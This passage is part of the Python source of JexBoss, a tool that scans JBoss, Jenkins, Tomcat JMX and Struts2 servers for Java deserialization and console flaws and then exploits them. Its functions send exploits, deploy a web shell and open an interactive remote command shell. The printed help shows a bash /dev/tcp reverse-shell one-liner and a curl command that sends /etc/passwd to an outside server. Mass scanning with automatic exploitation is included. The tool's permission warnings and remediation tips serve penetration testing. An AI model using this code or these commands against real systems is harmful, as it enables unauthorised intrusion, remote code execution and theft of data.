invoker/JMXInvokerServlet 394 | if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in r.getheader('Content-Type'): 395 | paths[vector] = 200 396 | else: 397 | paths[vector] = 505 398 | 399 | elif vector == "web-console": 400 | # user privided JMXInvoker path and checking web-console... 401 | if "/invoker/JMXInvokerServlet" in url: 402 | paths[vector] = 505 403 | # if the user not provided the path, append the "/web-console/..." 
404 | else: 405 | 406 | if not url.endswith(str(paths[vector])) and not url.endswith(str(paths[vector]) + "/"): 407 | url_to_check = url + str(paths[vector]) 408 | else: 409 | url_to_check = url 410 | 411 | r = gl_http_pool.request('HEAD', url_to_check, redirect=False, headers=headers) 412 | # if head method is not allowed/supported, try GET 413 | if r.status in (405, 406): 414 | r = gl_http_pool.request('GET', url_to_check, redirect=False, headers=headers) 415 | 416 | # if web-console/Invoker or invoker/JMXInvokerServlet 417 | if r.getheader('Content-Type') is not None and 'x-java-serialized-object' in r.getheader('Content-Type'): 418 | paths[vector] = 200 419 | else: 420 | paths[vector] = 505 421 | 422 | # other jboss vector 423 | else: 424 | r = gl_http_pool.request('HEAD', url + str(paths[vector]), redirect=False, headers=headers) 425 | # if head method is not allowed/supported, try GET 426 | if r.status in (405, 406): 427 | r = gl_http_pool.request('GET', url + str(paths[vector]), redirect=False, headers=headers) 428 | # check if the server respond with 200/500 for all requests 429 | if r.status in (200, 500): 430 | r = gl_http_pool.request('GET', url + str(paths[vector])+ '/github.com/joaomatosf/jexboss', redirect=False,headers=headers) 431 | 432 | if r.status == 200: 433 | r.status = 505 434 | else: 435 | r.status = 200 436 | 437 | paths[vector] = r.status 438 | 439 | # ---------------- 440 | # Analysis of the results 441 | # ---------------- 442 | # check if the proxy do not support running in the same port of the target 443 | if r is not None and r.status == 400 and gl_args.proxy: 444 | if parse_url(gl_args.proxy).port == url_check.port: 445 | print_and_flush(RED + "[ ERROR ]\n * An error occurred because the proxy server is running on the " 446 | "same port as the server port (port %s).\n" 447 | " Please use a different port in the proxy.\n" % url_check.port + ENDC) 448 | logging.critical("Proxy returns 400 Bad Request because is running in the same port 
as the server") 449 | fatal_error = True 450 | break 451 | 452 | # check if it's false positive 453 | if r is not None and len(r.getheaders()) == 0: 454 | print_and_flush(RED + "[ ERROR ]\n * The server %s is not an HTTP server.\n" % url + ENDC) 455 | logging.error("The server %s is not an HTTP server." % url) 456 | for key in paths: paths[key] = 505 457 | break 458 | 459 | if paths[vector] in (301, 302, 303, 307, 308): 460 | url_redirect = r.get_redirect_location() 461 | print_and_flush(GREEN + " [ REDIRECT ]\n * The server sent a redirect to: %s\n" % url_redirect) 462 | elif paths[vector] == 200 or paths[vector] == 500: 463 | if vector == "admin-console": 464 | print_and_flush(RED + " [ EXPOSED ]" + ENDC) 465 | logging.info("Server %s: EXPOSED" %url) 466 | elif vector == "Jenkins": 467 | print_and_flush(RED + " [ POSSIBLE VULNERABLE ]" + ENDC) 468 | logging.info("Server %s: RUNNING JENKINS" %url) 469 | elif vector == "JMX Tomcat": 470 | print_and_flush(RED + " [ MAYBE VULNERABLE ]" + ENDC) 471 | logging.info("Server %s: RUNNING JENKINS" %url) 472 | else: 473 | print_and_flush(RED + " [ VULNERABLE ]" + ENDC) 474 | logging.info("Server %s: VULNERABLE" % url) 475 | elif paths[vector] == 100: 476 | paths[vector] = 200 477 | print_and_flush(RED + " [ INCONCLUSIVE - NEED TO CHECK ]" + ENDC) 478 | logging.info("Server %s: INCONCLUSIVE - NEED TO CHECK" % url) 479 | elif paths[vector] == 110: 480 | logging.info("Server %s: CHECK OTHERS PARAMETERS" % url) 481 | else: 482 | print_and_flush(GREEN + " [ OK ]") 483 | except Exception as err: 484 | print_and_flush(RED + "\n * An error occurred while connecting to the host %s (%s)\n" % (url, err) + ENDC) 485 | logging.info("An error occurred while connecting to the host %s" % url, exc_info=traceback) 486 | paths[vector] = 505 487 | 488 | if fatal_error: 489 | exit(1) 490 | else: 491 | return paths 492 | 493 | 494 | def auto_exploit(url, exploit_type): 495 | """ 496 | Automatically exploit a URL 497 | :param url: The URL to 
exploit 498 | :param exploit_type: One of the following 499 | exploitJmxConsoleFileRepository: tested and working in JBoss 4 and 5 500 | exploitJmxConsoleMainDeploy: tested and working in JBoss 4 and 6 501 | exploitWebConsoleInvoker: tested and working in JBoss 4 502 | exploitJMXInvokerFileRepository: tested and working in JBoss 4 and 5 503 | exploitAdminConsole: tested and working in JBoss 5 and 6 (with default password) 504 | """ 505 | if exploit_type in ("Application Deserialization", "Servlet Deserialization"): 506 | print_and_flush(GREEN + "\n * Preparing to send exploit to %s. Please wait...\n" % url) 507 | else: 508 | print_and_flush(GREEN + "\n * Sending exploit code to %s. Please wait...\n" % url) 509 | 510 | result = 505 511 | if exploit_type == "jmx-console": 512 | 513 | result = _exploits.exploit_jmx_console_file_repository(url) 514 | if result != 200 and result != 500: 515 | result = _exploits.exploit_jmx_console_main_deploy(url) 516 | 517 | elif exploit_type == "web-console": 518 | 519 | # if the user not provided the path 520 | if url.endswith("/web-console/Invoker") or url.endswith("/web-console/Invoker/"): 521 | url = url.replace("/web-console/Invoker", "") 522 | 523 | result = _exploits.exploit_web_console_invoker(url) 524 | if result == 404: 525 | host, port = get_host_port_reverse_params() 526 | if host == port == gl_args.cmd == None: return False 527 | result = _exploits.exploit_servlet_deserialization(url + "/web-console/Invoker", host=host, port=port, 528 | cmd=gl_args.cmd, is_win=gl_args.windows, gadget=gl_args.gadget, 529 | gadget_file=gl_args.load_gadget) 530 | elif exploit_type == "JMXInvokerServlet": 531 | 532 | # if the user not provided the path 533 | if url.endswith("/invoker/JMXInvokerServlet") or url.endswith("/invoker/JMXInvokerServlet/"): 534 | url = url.replace("/invoker/JMXInvokerServlet", "") 535 | 536 | result = _exploits.exploit_jmx_invoker_file_repository(url, 0) 537 | if result != 200 and result != 500: 538 | result = 
_exploits.exploit_jmx_invoker_file_repository(url, 1) 539 | if result == 404: 540 | host, port = get_host_port_reverse_params() 541 | if host == port == gl_args.cmd == None: return False 542 | result = _exploits.exploit_servlet_deserialization(url + "/invoker/JMXInvokerServlet", host=host, port=port, 543 | cmd=gl_args.cmd, is_win=gl_args.windows, gadget=gl_args.gadget, 544 | gadget_file=gl_args.load_gadget) 545 | 546 | elif exploit_type == "admin-console": 547 | 548 | result = _exploits.exploit_admin_console(url, gl_args.jboss_login) 549 | 550 | elif exploit_type == "Jenkins": 551 | 552 | host, port = get_host_port_reverse_params() 553 | if host == port == gl_args.cmd == None: return False 554 | result = _exploits.exploit_jenkins(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows, 555 | gadget=gl_args.gadget, show_payload=gl_args.show_payload) 556 | elif exploit_type == "JMX Tomcat": 557 | 558 | host, port = get_host_port_reverse_params() 559 | if host == port == gl_args.cmd == None: return False 560 | result = _exploits.exploit_jrmi(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows) 561 | 562 | elif exploit_type == "Application Deserialization": 563 | 564 | host, port = get_host_port_reverse_params() 565 | 566 | if host == port == gl_args.cmd == gl_args.load_gadget == None: return False 567 | 568 | result = _exploits.exploit_application_deserialization(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows, 569 | param=gl_args.post_parameter, force=gl_args.force, 570 | gadget_type=gl_args.gadget, show_payload=gl_args.show_payload, 571 | gadget_file=gl_args.load_gadget) 572 | 573 | elif exploit_type == "Servlet Deserialization": 574 | 575 | host, port = get_host_port_reverse_params() 576 | 577 | if host == port == gl_args.cmd == gl_args.load_gadget == None: return False 578 | 579 | result = _exploits.exploit_servlet_deserialization(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows, 580 | 
gadget=gl_args.gadget, gadget_file=gl_args.load_gadget) 581 | 582 | elif exploit_type == "Struts2": 583 | 584 | result = 200 585 | 586 | # if it seems to be exploited (201 is for jboss exploited with gadget) 587 | if result == 200 or result == 500 or result == 201: 588 | 589 | # if not auto_exploit, ask type enter to continue... 590 | if not gl_args.auto_exploit: 591 | 592 | if exploit_type in ("Application Deserialization", "Jenkins", "JMX Tomcat", "Servlet Deserialization") or result == 201: 593 | print_and_flush(BLUE + " * The exploit code was successfully sent. Check if you received the reverse shell\n" 594 | " connection on your server or if your command was executed. \n"+ ENDC+ 595 | " Type [ENTER] to continue...\n") 596 | # wait while enter is typed 597 | input().lower() if version_info[0] >= 3 else raw_input().lower() 598 | return True 599 | else: 600 | if exploit_type == 'Struts2': 601 | shell_http_struts(url) 602 | else: 603 | print_and_flush(GREEN + " * Successfully deployed code! Starting command shell. Please wait...\n" + ENDC) 604 | shell_http(url, exploit_type) 605 | 606 | # if auto exploit mode, print message and continue... 607 | else: 608 | print_and_flush(GREEN + " * Successfully deployed/sended code via vector %s\n *** Run JexBoss in Standalone mode " 609 | "to open command shell. ***" %(exploit_type) + ENDC) 610 | return True 611 | 612 | # if not exploited, print error messagem and ask for type enter 613 | else: 614 | if exploit_type == 'admin-console': 615 | print_and_flush(GREEN + "\n * You can still try to exploit deserialization vulnerabilitie in ViewState!\n" + 616 | " Try this: python jexboss.py -u %s/admin-console/login.seam --app-unserialize\n" %url + 617 | " Type [ENTER] to continue...\n" + ENDC) 618 | 619 | else: 620 | print_and_flush(RED + "\n * Could not exploit the flaw automatically. 
Exploitation requires manual analysis...\n" + 621 | " Type [ENTER] to continue...\n" + ENDC) 622 | logging.error("Could not exploit the server %s automatically. HTTP Code: %s" %(url, result)) 623 | # wait while enter is typed 624 | input().lower() if version_info[0] >= 3 else raw_input().lower() 625 | return False 626 | 627 | 628 | def ask_for_reverse_host_and_port(): 629 | print_and_flush(GREEN + " * Please enter the IP address and tcp PORT of your listening server for try to get a REVERSE SHELL.\n" 630 | " OBS: You can also use the --cmd \"command\" to send specific commands to run on the server."+NORMAL) 631 | 632 | # If not *nix (that is, if somethine like git bash on Rwindow$) 633 | if not sys.stdout.isatty(): 634 | print_and_flush(" IP Address (RHOST): ", same_line=True) 635 | host = input().lower() if version_info[0] >= 3 else raw_input().lower() 636 | print_and_flush(" Port (RPORT): ", same_line=True) 637 | port = input().lower() if version_info[0] >= 3 else raw_input().lower() 638 | else: 639 | host = input(" IP Address (RHOST): ").lower() if version_info[0] >= 3 else raw_input(" IP Address (RHOST): ").lower() 640 | port = input(" Port (RPORT): ").lower() if version_info[0] >= 3 else raw_input(" Port (RPORT): ").lower() 641 | 642 | print ("") 643 | return str(host), str(port) 644 | 645 | 646 | def get_host_port_reverse_params(): 647 | # if reverse host were provided in the args, take it 648 | if gl_args.reverse_host: 649 | 650 | if gl_args.windows: 651 | jexboss.print_and_flush(RED + "\n * WINDOWS Systems still do not support reverse shell.\n" 652 | " Use option --cmd instead of --reverse-shell...\n" + ENDC + 653 | " Type [ENTER] to continue...\n") 654 | # wait while enter is typed 655 | input().lower() if version_info[0] >= 3 else raw_input().lower() 656 | return None, None 657 | 658 | tokens = gl_args.reverse_host.split(":") 659 | if len(tokens) != 2: 660 | host, port = ask_for_reverse_host_and_port() 661 | else: 662 | host = tokens[0] 663 | port = 
tokens[1] 664 | # if neither cmd nor reverse nor load_gadget was provided, ask host and port 665 | elif gl_args.cmd is None and gl_args.load_gadget is None: 666 | host, port = ask_for_reverse_host_and_port() 667 | else: 668 | # if cmd or gadget file ware privided 669 | host, port = None, None 670 | 671 | return host, port 672 | 673 | 674 | def shell_http_struts(url): 675 | """ 676 | Connect to an HTTP shell 677 | :param url: struts app url 678 | :param shell_type: The type of shell to connect to 679 | """ 680 | print_and_flush("# ----------------------------------------- #\n") 681 | print_and_flush(GREEN + BOLD + " * For a Reverse Shell (like meterpreter =]), type sometime like: \n\n" 682 | "\n" +ENDC+ 683 | " Shell>/bin/bash -i > /dev/tcp/192.168.0.10/4444 0>&1 2>&1\n" 684 | " \n"+GREEN+ 685 | " And so on... =]\n" +ENDC 686 | ) 687 | print_and_flush("# ----------------------------------------- #\n") 688 | 689 | resp = _exploits.exploit_struts2_jakarta_multipart(url,'whoami', gl_args.cookies) 690 | 691 | print_and_flush(resp.replace('\\n', '\n'), same_line=True) 692 | logging.info("Server %s exploited!" 
# FIX: capture the readtimeout File "jexboss.py", line 333, in shell_http
def shell_http(url, shell_type):
    """
    Connect to an HTTP shell
    :param url: The URL to connect to
    :param shell_type: The type of shell to connect to

    Flow: one priming GET to the shell path, a fixed 7 s wait, three fixed
    commands ('uname -a', 'cat /etc/issue', 'id'), then an interactive loop
    that forwards each typed line as the ``ppp`` query parameter until the
    user types ``exit``.  Uses the module-level ``gl_http_pool`` for every
    request and reads ``gl_args.disable_check_updates``.
    """
    headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Connection": "keep-alive",
               "User-Agent": get_random_user_agent()}

    # The server-side page reads this header to skip its own update check.
    if gl_args.disable_check_updates:
        headers['no-check-updates'] = 'true'

    # NOTE(review): there is no final ``else`` - any other shell_type leaves
    # ``path`` unbound and the request below raises UnboundLocalError.
    if shell_type == "jmx-console" or shell_type == "web-console" or shell_type == "admin-console":
        path = '/jexws4/jexws4.jsp?'
    elif shell_type == "JMXInvokerServlet":
        path = '/jexinv4/jexinv4.jsp?'

    # Priming request; its response is discarded and errors are not caught here.
    gl_http_pool.request('GET', url+path, redirect=False, headers=headers)

    # Fixed delay before the first command (presumably deploy time - not configurable).
    sleep(7)
    resp = ""
    print_and_flush("# ----------------------------------------- # LOL # ----------------------------------------- #\n")
    print_and_flush(RED + " * " + url + ": \n" + ENDC)
    print_and_flush("# ----------------------------------------- #\n")
    print_and_flush(GREEN + BOLD + " * For a Reverse Shell (like meterpreter =]), type the command: \n\n"
                    " jexremote=YOUR_IP:YOUR_PORT\n\n" + ENDC + GREEN +
                    " Example:\n" +ENDC+
                    " Shell>jexremote=192.168.0.10:4444\n"
                    "\n" +GREEN+
                    " Or use other techniques of your choice, like:\n" +ENDC+
                    " Shell>/bin/bash -i > /dev/tcp/192.168.0.10/4444 0>&1 2>&1\n"
                    " \n"+GREEN+
                    " And so on... =]\n" +ENDC
                    )
    print_and_flush("# ----------------------------------------- #\n")

    # Fingerprint commands; the loop variable is rebound to its URL-encoded form.
    for cmd in ['uname -a', 'cat /etc/issue', 'id']:
        cmd = urlencode({"ppp": cmd})
        try:
            r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
            # Output is taken as everything after the first '>' - fragile HTML scraping.
            resp += " " + str(r.data).split(">")[1]
        except:
            # Bare except: any failure (network, missing '>' in the body, Ctrl-C)
            # is read as request filtering and the update header is forced on.
            print_and_flush(RED + " * Apparently an IPS is blocking some requests. Check for updates will be disabled...\n\n"+ENDC)
            # NOTE(review): ``exc_info=traceback`` passes the module object, not exception info.
            logging.warning("Disabling checking for updates.", exc_info=traceback)
            headers['no-check-updates'] = 'true'

    print_and_flush(resp.replace('\\n', '\n'), same_line=True)
    logging.info("Server %s exploited!" %url)

    while 1:
        print_and_flush(BLUE + "[Type commands or \"exit\" to finish]" +ENDC)

        # Non-tty stdout: print the prompt separately so it is flushed before input().
        if not sys.stdout.isatty():
            print_and_flush("Shell> ", same_line=True)
            cmd = input() if version_info[0] >= 3 else raw_input()
        else:
            cmd = input("Shell> ") if version_info[0] >= 3 else raw_input("Shell> ")

        if cmd == "exit":
            break

        cmd = urlencode({"ppp": cmd})
        try:
            r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
        except:
            print_and_flush(RED + " * Error contacting the command shell. Try again and see logs for details ...")
            logging.error("Error contacting the command shell", exc_info=traceback)
            continue

        resp = str(r.data)
        if r.status == 404:
            print_and_flush(RED + " * Error contacting the command shell. Try again later...")
            continue
        stdout = ""
        try:
            # Command output is expected after the first "pre>" in the response body.
            stdout = resp.split("pre>")[1]
        except:
            print_and_flush(RED + " * Error contacting the command shell. Try again later...")
        if stdout.count("An exception occurred processing JSP page") == 1:
            # cmd is still URL-encoded here; the text after '=' is what gets echoed.
            print_and_flush(RED + " * Error executing command \"%s\". " % cmd.split("=")[1] + ENDC)
        else:
            print_and_flush(stdout.replace('\\n', '\n'))
" % cmd.split("=")[1] + ENDC) 792 | else: 793 | print_and_flush(stdout.replace('\\n', '\n')) 794 | 795 | 796 | def clear(): 797 | """ 798 | Clears the console 799 | """ 800 | if name == 'posix': 801 | system('clear') 802 | elif name == ('ce', 'nt', 'dos'): 803 | system('cls') 804 | 805 | 806 | def banner(): 807 | """ 808 | Print the banner 809 | """ 810 | clear() 811 | print_and_flush(RED1 + "\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n" 812 | " | * And others Java Deserialization Vulnerabilities * | \n" 813 | " | |\n" 814 | " | @author: João Filho Matos Figueiredo |\n" 815 | " | @contact: joaomatosf@gmail.com |\n" 816 | " | |\n" 817 | " | @update: https://github.com/joaomatosf/jexboss |\n" 818 | " #______________________________________________________#\n") 819 | print_and_flush(RED1 + " @version: %s" % __version__) 820 | print_and_flush (ENDC) 821 | 822 | 823 | def help_usage(): 824 | usage = (BOLD + BLUE + " Examples: [for more options, type python jexboss.py -h]\n" + ENDC + 825 | BLUE + "\n For simple usage, you must provide the host name or IP address you\n" 826 | " want to test [-host or -u]:\n" + 827 | GREEN + "\n $ python jexboss.py -u https://site.com.br" + 828 | 829 | BLUE + "\n\n For Java Deserialization Vulnerabilities in HTTP POST parameters. 
\n" 830 | " This will ask for an IP address and port to try to get a reverse shell:\n" + 831 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize" + 832 | 833 | BLUE + "\n\n For Java Deserialization Vulnerabilities in a custom HTTP parameter and \n" 834 | " to send a custom command to be executed on the exploited server:\n" + 835 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize\n" 836 | " -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'" + 837 | 838 | BLUE + "\n\n For Java Deserialization Vulnerabilities in a Servlet (like Invoker):\n"+ 839 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize\n" + 840 | 841 | BLUE + "\n\n To test Java Deserialization Vulnerabilities with DNS Lookup:\n" + 842 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/path --gadget dns --dns test.yourdomain.com" + 843 | 844 | BLUE + "\n\n For Jenkins CLI Deserialization Vulnerabilitie:\n"+ 845 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/jenkins --jenkins"+ 846 | 847 | BLUE + "\n\n For Apache Struts2 Vulnerabilities (CVE-2017-5638):\n" + 848 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/path.action --struts2\n" + 849 | 850 | BLUE + "\n\n For auto scan mode, you must provide the network in CIDR format, " 851 | "\n list of ports and filename for store results:\n" + 852 | GREEN + "\n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 \n" 853 | " -results report_auto_scan.log" + 854 | 855 | BLUE + "\n\n For file scan mode, you must provide the filename with host list " 856 | "\n to be scanned (one host per line) and filename for store results:\n" + 857 | GREEN + "\n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log\n" + ENDC) 858 | return usage 859 | 860 | 861 | def network_args(string): 862 | try: 863 | if version_info[0] >= 3: 864 | value = 
def main():
    """
    Run interactively. Call when the module is run by itself.
    :return: Exit code

    Reads everything from the module-level ``gl_args`` (parsed in the
    ``__main__`` block): first the optional self-update prompt, then one of the
    three modes ('standalone', 'auto-scan', 'file-scan'), then a summary.
    In the two scan modes, findings are appended to the results file as they
    are produced (``flush()`` after each write).
    """
    # check for Updates
    if not gl_args.disable_check_updates:
        updates = _updates.check_updates()
        if updates:
            print_and_flush(BLUE + BOLD + "\n\n * An update is available and is recommended update before continuing.\n" +
                            " Do you want to update now?")
            # Non-tty stdout: print the prompt separately so it is flushed before input().
            if not sys.stdout.isatty():
                print_and_flush(" YES/no? ", same_line=True)
                pick = input().lower() if version_info[0] >= 3 else raw_input().lower()
            else:
                pick = input(" YES/no? ").lower() if version_info[0] >= 3 else raw_input(" YES/no? ").lower()

            print_and_flush(ENDC)
            # Anything other than an explicit "no" (including Enter) updates.
            if pick != "no":
                updated = _updates.auto_update()
                if updated:
                    print_and_flush(GREEN + BOLD + "\n * The JexBoss has been successfully updated. Please run again to enjoy the updates.\n" +ENDC)
                    exit(0)
                else:
                    print_and_flush(RED + BOLD + "\n\n * An error occurred while updating the JexBoss. Please try again..\n" +ENDC)
                    exit(1)

    vulnerables = False
    # check vulnerabilities for standalone mode
    if gl_args.mode == 'standalone':
        url = gl_args.host
        scan_results = check_vul(url)
        # performs exploitation for jboss vulnerabilities
        # A vector counts as a finding when check_vul() recorded status 200 or 500.
        for vector in scan_results:
            if scan_results[vector] == 200 or scan_results[vector] == 500:
                vulnerables = True
                if gl_args.auto_exploit:
                    auto_exploit(url, vector)
                else:

                    if vector == "Application Deserialization":
                        msg_confirm = " If successful, this operation will provide a reverse shell. You must enter the\n" \
                                      " IP address and Port of your listening server.\n"
                    else:
                        msg_confirm = " If successful, this operation will provide a simple command shell to execute \n" \
                                      " commands on the server..\n"

                    print_and_flush(BLUE + "\n\n * Do you want to try to run an automated exploitation via \"" +
                                    BOLD + vector + NORMAL + "\" ?\n" +
                                    msg_confirm +
                                    RED + " Continue only if you have permission!" + ENDC)
                    if not sys.stdout.isatty():
                        print_and_flush(" yes/NO? ", same_line=True)
                        pick = input().lower() if version_info[0] >= 3 else raw_input().lower()
                    else:
                        pick = input(" yes/NO? ").lower() if version_info[0] >= 3 else raw_input(" yes/NO? ").lower()

                    # Only the exact word "yes" proceeds; default is no.
                    if pick == "yes":
                        auto_exploit(url, vector)

    # check vulnerabilities for auto scan mode
    elif gl_args.mode == 'auto-scan':
        # NOTE(review): opened without ``with``; closed below only if no exception escapes the loop.
        file_results = open(gl_args.results, 'w')
        file_results.write("JexBoss Scan Mode Report\n\n")
        for ip in gl_args.network.hosts():
            # gl_interrupted is set elsewhere (signal handler, presumably) to stop the sweep.
            if gl_interrupted: break
            for port in gl_args.ports.split(","):
                if check_connectivity(ip, port):
                    url = "{0}:{1}".format(ip,port)
                    ip_results = check_vul(url)
                    for key in ip_results.keys():
                        if ip_results[key] == 200 or ip_results[key] == 500:
                            vulnerables = True
                            if gl_args.auto_exploit:
                                result_exploit = auto_exploit(url, key)
                                if result_exploit:
                                    file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key))
                                else:
                                    file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key))
                            else:
                                file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key))

                            # Flush per finding so a partial report survives an interrupt.
                            file_results.flush()
                else:
                    print_and_flush(RED + "\n * Host %s:%s does not respond." % (ip,port) + ENDC)
        file_results.close()
    # check vulnerabilities for file scan mode
    elif gl_args.mode == 'file-scan':
        # NOTE(review): neither file is opened with ``with``; file_input is never closed.
        file_results = open(gl_args.out, 'w')
        file_results.write("JexBoss Scan Mode Report\n\n")
        file_input = open(gl_args.file, 'r')
        for url in file_input.readlines():
            if gl_interrupted: break
            url = url.strip()
            # parse_url() is called three times per line; index 2 is the host, 3 the port.
            ip = str(parse_url(url)[2])
            # Port 80 is assumed when the line carries no explicit port.
            port = parse_url(url)[3] if parse_url(url)[3] != None else 80
            if check_connectivity(ip, port):
                url_results = check_vul(url)
                for key in url_results.keys():
                    if url_results[key] == 200 or url_results[key] == 500:
                        vulnerables = True
                        if gl_args.auto_exploit:
                            result_exploit = auto_exploit(url, key)
                            if result_exploit:
                                file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key))
                            else:
                                file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key))
                        else:
                            file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key))

                        file_results.flush()
            else:
                print_and_flush(RED + "\n * Host %s:%s does not respond." % (ip, port) + ENDC)
        file_results.close()

    # resume results
    if vulnerables:
        banner()
        print_and_flush(RED + BOLD + " Results: potentially compromised server!" + ENDC)
        if gl_args.mode == 'file-scan':
            print_and_flush(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.out) + ENDC)
        elif gl_args.mode == 'auto-scan':
            print_and_flush(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.results) + ENDC)

        # Remediation guidance printed for the operator; static text.
        print_and_flush(GREEN + " ---------------------------------------------------------------------------------\n"
                        + BOLD + " Recommendations: \n" + ENDC +
                        GREEN + " - Remove web consoles and services that are not used, eg:\n"
                        " $ rm web-console.war http-invoker.sar jmx-console.war jmx-invoker-adaptor-server.sar admin-console.war\n"
                        " - Use a reverse proxy (eg. nginx, apache, F5)\n"
                        " - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n"
                        " - Search vestiges of exploitation within the directories \"deploy\" and \"management\".\n"
                        " - Do NOT TRUST serialized objects received from the user\n"
                        " - If possible, stop using serialized objects as input!\n"
                        " - If you need to work with serialization, consider migrating to the Gson lib.\n"
                        " - Use a strict whitelist with Look-ahead[3] before deserialization\n"
                        " - For a quick (but not definitive) remediation for the viewState input, store the state \n"
                        " of the view components on the server (this will increase the heap memory consumption): \n"
                        " In web.xml, change the \"client\" parameter to \"server\" on STATE_SAVING_METHOD.\n"
                        " - Upgrade Apache Struts: https://cwiki.apache.org/confluence/display/WW/S2-045\n"
                        "\n References:\n"
                        " [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n"
                        " [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"
                        " [3] - https://www.ibm.com/developerworks/library/se-lookahead/\n"
                        " [4] - https://www.owasp.org/index.php/Deserialization_of_untrusted_data\n"
                        "\n"
                        " - If possible, discard this server!\n"
                        " ---------------------------------------------------------------------------------")
    else:
        print_and_flush(GREEN + "\n\n * Results: \n" +
                        " The server is not vulnerable to bugs tested ... :D\n" + ENDC)
    # infos
    print_and_flush(ENDC + " * Info: review, suggestions, updates, etc: \n" +
                    " https://github.com/joaomatosf/jexboss\n")

    print_and_flush(GREEN + BOLD + " * DONATE: " + ENDC + "Please consider making a donation to help improve this tool,\n" +
                    GREEN + BOLD + " * Bitcoin Address: " + ENDC + " 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C \n")


    print_and_flush(ENDC)
:D\n" + ENDC) 1024 | # infos 1025 | print_and_flush(ENDC + " * Info: review, suggestions, updates, etc: \n" + 1026 | " https://github.com/joaomatosf/jexboss\n") 1027 | 1028 | print_and_flush(GREEN + BOLD + " * DONATE: " + ENDC + "Please consider making a donation to help improve this tool,\n" + 1029 | GREEN + BOLD + " * Bitcoin Address: " + ENDC + " 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C \n" ) 1030 | 1031 | 1032 | print_and_flush(ENDC) 1033 | 1034 | #banner() 1035 | 1036 | 1037 | if __name__ == "__main__": 1038 | 1039 | 1040 | parser = argparse.ArgumentParser( 1041 | formatter_class=argparse.RawDescriptionHelpFormatter, 1042 | #description="JexBoss v%s: JBoss verify and EXploitation Tool" %__version, 1043 | description=textwrap.dedent(RED1 + 1044 | "\n # --- JexBoss: Jboss verify and EXploitation Tool --- #\n" 1045 | " | And others Java Deserialization Vulnerabilities | \n" 1046 | " | |\n" 1047 | " | @author: João Filho Matos Figueiredo |\n" 1048 | " | @contact: joaomatosf@gmail.com |\n" 1049 | " | |\n" 1050 | " | @updates: https://github.com/joaomatosf/jexboss |\n" 1051 | " #______________________________________________________#\n" 1052 | " @version: " + __version__ + "\n" + help_usage()), 1053 | epilog="", 1054 | prog="JexBoss" 1055 | ) 1056 | 1057 | group_standalone = parser.add_argument_group('Standalone mode') 1058 | group_advanced = parser.add_argument_group('Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER)') 1059 | group_auto_scan = parser.add_argument_group('Auto scan mode') 1060 | group_file_scan = parser.add_argument_group('File scan mode') 1061 | 1062 | # optional parameters --------------------------------------------------------------------------------------- 1063 | parser.add_argument('--version', action='version', version='%(prog)s ' + __version__) 1064 | parser.add_argument("--auto-exploit", "-A", help="Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!)", 1065 | action='store_true') 1066 | 
parser.add_argument("--disable-check-updates", "-D", help="Disable two updates checks: 1) Check for updates " 1067 | "performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates " 1068 | "performed by the jexboss client at http://joaomatosf.com/rnp/releases.txt", 1069 | action='store_true') 1070 | parser.add_argument('-mode', help="Operation mode (DEFAULT: standalone)", choices=['standalone', 'auto-scan', 'file-scan'], default='standalone') 1071 | parser.add_argument("--app-unserialize", "-j", 1072 | help="Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, " 1073 | "oldFormData, etc)", action='store_true') 1074 | parser.add_argument("--servlet-unserialize", "-l", 1075 | help="Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces)", 1076 | action='store_true') 1077 | parser.add_argument("--jboss", help="Check only for JBOSS vectors.", action='store_true') 1078 | parser.add_argument("--jenkins", help="Check only for Jenkins CLI vector (CVE-2015-5317).", action='store_true') 1079 | parser.add_argument("--struts2", help="Check only for Struts2 Jakarta Multipart parser (CVE-2017-5638).", action='store_true') 1080 | parser.add_argument("--jmxtomcat", help="Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and " 1081 | "CVE-2016-3427). OBS: Will not be checked by default.", action='store_true') 1082 | 1083 | parser.add_argument('--proxy', "-P", help="Use a http proxy to connect to the target URL (eg. 
